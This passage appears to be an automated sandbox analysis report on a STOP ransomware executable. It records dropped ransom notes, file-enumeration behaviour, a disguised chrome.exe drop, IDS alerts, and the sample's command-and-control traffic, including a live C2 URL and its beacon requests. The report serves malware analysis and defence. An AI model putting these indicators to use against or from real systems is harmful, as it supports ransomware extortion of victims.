Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | File created: C:\_readme.txt
Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | File created: C:\$WinREAgent\_readme.txt
Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | File created: C:\$WinREAgent\Scratch\_readme.txt
Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | File created: C:\Users\user\_readme.txt
Source: unknown | HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49729 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.139.220:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359906462.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003BD6000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362164144.0000000003BC4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2298890596.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\j source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360193328.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2359314886.0000000003B38000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\o source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2314093672.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316169449.000000000333A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2316398950.0000000003B5D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2355137046.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2353303080.0000000003B30000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\be\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046565289.0000000003327000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ata\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276405605.00000000032F8000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276474116.00000000032FC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251341144.000000000388F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e\*\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275071344.0000000003303000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275036397.0000000003300000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275912662.0000000003304000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2376983610.0000000003B78000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2381664053.0000000003B94000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2369942184.0000000003C21000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2362545370.0000000003C2C000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2366153323.0000000003C20000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2040839710.0000000003359000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2017927846.0000000003301000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2276510131.0000000003355000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275508085.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251738485.0000000003353000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275299047.000000000334D000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046220490.0000000003341000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046303739.0000000003302000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2018734898.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 
3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022014265.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275835026.000000000334E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2022446710.0000000003357000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046429413.0000000003321000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1957412867.0000000003770000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251695399.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251930708.0000000003335000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274611974.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274989424.0000000003331000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2275255859.0000000003339000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\O\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274518073.00000000037AA000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2274719064.00000000037C3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: sers\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb.ppvw source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251649553.0000000003323000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251527503.000000000331A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\* source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2251480244.0000000003361000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2046044060.0000000003378000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\C\e\ source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2360903093.0000000003AED000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe System file written: C:\Users\user\AppData\Local\Temp\chrome.exe
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_00470160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_0046FB98
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_0046F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_0046F730
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_00470160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00470160
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 2_2_0046FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_0046FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 3_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 3_2_00E40160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 3_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00E3FB98
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 4_2_00E40160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E40160
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 4_2_00E3F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00E3F730
              Source: C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 4_2_00E3FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00E3FB98

              Networking

              Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49733 -> 175.119.10.231:80
              Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49736 -> 175.119.10.231:80
              Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49737 -> 175.119.10.231:80
              Source: Traffic Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49746 -> 175.119.10.231:80
              Source: Malware configuration extractor URLs: http://zexeq.com/test2/get.php
              Source: Joe Sandbox View IP Address: 172.67.139.220
              Source: Joe Sandbox View IP Address: 175.119.10.231
              Source: Joe Sandbox View ASN Name: SKB-ASSKBroadbandCoLtdKR
              Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe Code function: 0_2_0046CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_0046CF10
              Source: global traffic HTTP traffic detected: GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
              Source: global traffic HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
              Source: global traffic HTTP traffic detected: GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952314760.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952507557.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952594991.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
              Source: unknown DNS traffic detected: queries for: api.2ip.ua
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1962329518.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952218391.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.amazon.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952353931.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952417137.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.live.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952433523.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.nytimes.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeString found in binary or memory: http://www.openssl.org/support/faq.html
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952491269.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.reddit.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952507557.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.twitter.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000003.1952579662.0000000004040000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.wikipedia.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.1952594991.0000000003770000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000002.2385682802.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000002.00000003.2383714101.0000000000A8E000.00000004.00000020.00020000.00000000.sdmp, 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=F8AFCDC4E
              Source: 3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe, 00000003.00000002.2914575894.0000000001323000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zexeq.com/test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
